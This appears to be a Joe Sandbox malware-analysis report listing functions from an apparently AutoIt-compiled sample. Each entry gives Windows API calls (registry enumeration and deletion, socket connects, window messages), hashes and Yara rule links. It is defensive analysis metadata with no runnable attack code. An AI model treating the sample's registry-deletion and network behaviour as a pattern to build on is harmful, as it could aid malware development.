Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: ed3637f6fe4b7c85bad01d1a8c04878584d371d46de8b81b3ddb96abdd4a0a8f
Instruction ID: f7e8561afd2dc62d702270d01b00cc580499edc1330f585ca4006f71db96ced6
Opcode Fuzzy Hash: ed3637f6fe4b7c85bad01d1a8c04878584d371d46de8b81b3ddb96abdd4a0a8f
Instruction Fuzzy Hash: 8E410775A04309AFDB20EF50D884EEABBB4FB05360F248529FD159B260D730ED54EB51

Function 00F80FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F80FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F80FFE
FreeLibrary.KERNEL32(00000000), ref: 00F810B5

Part of subcall function 00F80FA5: RegCloseKey.ADVAPI32(?), ref: 00F8101B
Part of subcall function 00F80FA5: FreeLibrary.KERNEL32(?), ref: 00F8106D
Part of subcall function 00F80FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F81090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00F81058

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: e83caddb1fc471e4874541c39423157877d0fbfc22de5b691940312e700b298c
Instruction ID: d549f8c72acc98dbe7ed77ba4c9d8b2cc44c2f2b9849f635d60c55ee43bc4da5
Opcode Fuzzy Hash: e83caddb1fc471e4874541c39423157877d0fbfc22de5b691940312e700b298c
Instruction Fuzzy Hash: 7E310F71D01109BFDB159F90DC89EFFB7BCEF08310F104269E501E2151DA745E89ABA1

Function 00F862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F862EC
GetWindowLongW.USER32(018C59C8,000000F0), ref: 00F8631F
GetWindowLongW.USER32(018C59C8,000000F0), ref: 00F86354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F86386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F863DB

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 70c57032cadf68ad997fe48666251828a9352655f20429e96586b37fefd1309a
Instruction ID: 265d73c84bfacf36c5d22876124fa1cffa5df8bada5e990b70faa6d16493b617
Opcode Fuzzy Hash: 70c57032cadf68ad997fe48666251828a9352655f20429e96586b37fefd1309a
Instruction Fuzzy Hash: 22311431A402549FEB21DF18DD85FA537E1FB4A724F1901A4F501DF2B1CB71A884AB51

Function 00F5DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DB54
SysAllocString.OLEAUT32(00000000), ref: 00F5DB57
SysAllocString.OLEAUT32(?), ref: 00F5DB75
SysFreeString.OLEAUT32(?), ref: 00F5DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00F5DBA3
SysAllocString.OLEAUT32(?), ref: 00F5DBB1

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 4954cf5e4e4c92e832a1ed90026f79a6aa4284e7d62d0d3e52b3df0aa3be878f
Instruction ID: 68030ef59689ef985e009918ec6025c871d676f11d3db39e01fd804d947ba985
Opcode Fuzzy Hash: 4954cf5e4e4c92e832a1ed90026f79a6aa4284e7d62d0d3e52b3df0aa3be878f
Instruction Fuzzy Hash: 38219136A02219BF9F20DFA8DC88CBB73ADEB48360B118125FE14DB251D7709C49A760

Function 00F76173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F77DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F761C6
WSAGetLastError.WSOCK32(00000000), ref: 00F761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F7620E
connect.WSOCK32(00000000,?,00000010), ref: 00F76217
WSAGetLastError.WSOCK32 ref: 00F76221
closesocket.WSOCK32(00000000), ref: 00F7624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F76263

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 58b56be908c8e723b50ac9ec23ddd9498509a78207416ad77fe34decaf44a25f
Instruction ID: 711272a9d973c26729121a537e617d10b86f160ee306e0587bf47555dc9298fa
Opcode Fuzzy Hash: 58b56be908c8e723b50ac9ec23ddd9498509a78207416ad77fe34decaf44a25f
Instruction Fuzzy Hash: 4831A471600508AFDF10AF24CC85FBD7BA8EB45720F44806AFD09E7292DB74AD04EB62

Function 00F5F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F5F671
__wcsnicmp.LIBCMT ref: 00F5F692
__wcsnicmp.LIBCMT ref: 00F5F6AC

Strings

#OnAutoItStartRegister, xrefs: 00F5F6A6
#requireadmin, xrefs: 00F5F68C
#notrayicon, xrefs: 00F5F669

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 392cc93ee0a93777886c4bbfb76faa9c2befd9b47aa18197fe67110fa0046a4a
Instruction ID: 672bdefb02b11cfd45429f0f6c79484a2308274cd1d97d49cc03a24422f85fd5
Opcode Fuzzy Hash: 392cc93ee0a93777886c4bbfb76faa9c2befd9b47aa18197fe67110fa0046a4a
Instruction Fuzzy Hash: CA2167B36045216AD720A634BC02FA773D8DF59321F114479FE41C6091EB589D8DF295

Function 00F5DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5DC2F
SysAllocString.OLEAUT32(00000000), ref: 00F5DC32
SysAllocString.OLEAUT32 ref: 00F5DC53
SysFreeString.OLEAUT32 ref: 00F5DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00F5DC76
SysAllocString.OLEAUT32(?), ref: 00F5DC84

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: eb0303a3bc3d1fc167be78a074b79e137881bf4cecd03a45ddc9eb80edb7d05a
Instruction ID: 4353fdad5ff59100dd03b6a80b7b81f3fca30a9034306e1aff360fd289b9bd3a
Opcode Fuzzy Hash: eb0303a3bc3d1fc167be78a074b79e137881bf4cecd03a45ddc9eb80edb7d05a
Instruction Fuzzy Hash: D3218636605208AF9B20DFA8DC88DBB77ECEB08361B118125FE14CB261DA74DC49E764

Function 00F875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F87632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F8763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F8764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F87659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F87665

Strings

Msctls_Progress32, xrefs: 00F87603

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 48aced135b63eb9eae5074b460fd242ab190886348fdf5ebf3689429f54637b9
Instruction ID: 7847d9fca0d83093530628206afa50e398c9cc558b8828e41f53562035dab7f8
Opcode Fuzzy Hash: 48aced135b63eb9eae5074b460fd242ab190886348fdf5ebf3689429f54637b9
Instruction Fuzzy Hash: 6811B6B251021DBFEF159F64CC85EE77F5DEF087A8F114115B604A60A0DA72DC21EBA4

Function 00F29AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00F29AE6

Part of subcall function 00F23187: EncodePointer.KERNEL32(00000000), ref: 00F2318A
Part of subcall function 00F23187: __initp_misc_winsig.LIBCMT ref: 00F231A5
Part of subcall function 00F23187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F29EA0
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F29EB4
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F29EC7
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F29EDA
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F29EED
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F29F00
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F29F13
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F29F26
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F29F39
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F29F4C
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F29F5F
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F29F72
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F29F85
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F29F98
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F29FAB
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F29FBE

__mtinitlocks.LIBCMT ref: 00F29AEB
__mtterm.LIBCMT ref: 00F29AF4

Part of subcall function 00F29B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F29AF9,00F27CD0,00FBA0B8,00000014), ref: 00F29C56
Part of subcall function 00F29B5C: _free.LIBCMT ref: 00F29C5D
Part of subcall function 00F29B5C: DeleteCriticalSection.KERNEL32(00FBEC00,?,?,00F29AF9,00F27CD0,00FBA0B8,00000014), ref: 00F29C7F

__calloc_crt.LIBCMT ref: 00F29B19
__initptd.LIBCMT ref: 00F29B3B
GetCurrentThreadId.KERNEL32 ref: 00F29B42

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 9d70ebc55666451be5b2c4d71a9ae6d18dffccb006e1cf8c1130869942bbfdfb
Instruction ID: f1580c3e4fcaebab6ec69ffc1864aee938d7ce5df44ec46768fab7c967c96750
Opcode Fuzzy Hash: 9d70ebc55666451be5b2c4d71a9ae6d18dffccb006e1cf8c1130869942bbfdfb
Instruction Fuzzy Hash: 89F09032A1D7315AE6347774BC0769A3690EF42730F200A19F4A4D71D3EFE9854179A4

Function 00F2406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F23F85), ref: 00F24085
GetProcAddress.KERNEL32(00000000), ref: 00F2408C
EncodePointer.KERNEL32(00000000), ref: 00F24097
DecodePointer.KERNEL32(00F23F85), ref: 00F240B2

Strings

combase.dll, xrefs: 00F24080
RoUninitialize, xrefs: 00F24074

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 2262de7bf8d31dca054121993582007aeb1322964b6bf54f34753c1bada089d9
Instruction ID: 636b0511e09becce6278d87a10000eaae82ed04db4dfd5a72e4555d13a74e774
Opcode Fuzzy Hash: 2262de7bf8d31dca054121993582007aeb1322964b6bf54f34753c1bada089d9
Instruction Fuzzy Hash: EBE0EC70D81308EFEB50AF62FE0EF953AA4B704782F148025F101E60A0CBB79648FB15

Function 00F664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F6660B
_memmove.LIBCMT ref: 00F66546

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

_memmove.LIBCMT ref: 00F665B9
_memmove.LIBCMT ref: 00F666A0
_memmove.LIBCMT ref: 00F666B9
_memmove.LIBCMT ref: 00F666D5

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 96d792e38c76c4facbdde67addef648add14df66bc1d221183d54a23a2e9edca
Instruction ID: 66ed98ad517b4a2b2bfbaa6b8cce9ba577eb2d17e3f60a6919f5ef978a928216
Opcode Fuzzy Hash: 96d792e38c76c4facbdde67addef648add14df66bc1d221183d54a23a2e9edca
Instruction Fuzzy Hash: 2161BA7190065A9BCF01EF60DC82AFE37A5AF05308F448558F856AB293EB79EC05FB50

Function 00F801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F80320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F80349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8038C
RegCloseKey.ADVAPI32(00000000), ref: 00F80399

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 2efe4f47a85baa89d79aeb9d4f1002cd41b85c54542a5986b97f259bd974feda
Instruction ID: 9f8735c450d0eb1e8896957dba8c9dacccacc89a7b846caddc6682b03683e1be
Opcode Fuzzy Hash: 2efe4f47a85baa89d79aeb9d4f1002cd41b85c54542a5986b97f259bd974feda
Instruction Fuzzy Hash: 72515831608204AFC710EF64CC85EABBBE8FF85314F44491DF995872A2DB75E909EB52

Function 00F85799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00F857FB
GetMenuItemCount.USER32(00000000), ref: 00F85832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F8585A
GetMenuItemID.USER32(?,?), ref: 00F858C9
GetSubMenu.USER32(?,?), ref: 00F858D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00F85928

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 1b7176691606e1d12c49e1844b24f40b10815d88771a695681b01ede888350db
Instruction ID: 89d505ac490b4f4ecfb247070dd5bf52da3726193507fe916f5a33fa13c4af15
Opcode Fuzzy Hash: 1b7176691606e1d12c49e1844b24f40b10815d88771a695681b01ede888350db
Instruction Fuzzy Hash: FA515D75E00615EFCF11EF64C845AEEB7B4EF48720F14406AE811BB351DB74AE41AB90

Function 00F5EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F5EF06
VariantClear.OLEAUT32(00000013), ref: 00F5EF78
VariantClear.OLEAUT32(00000000), ref: 00F5EFD3
_memmove.LIBCMT ref: 00F5EFFD
VariantClear.OLEAUT32(?), ref: 00F5F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F5F078

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

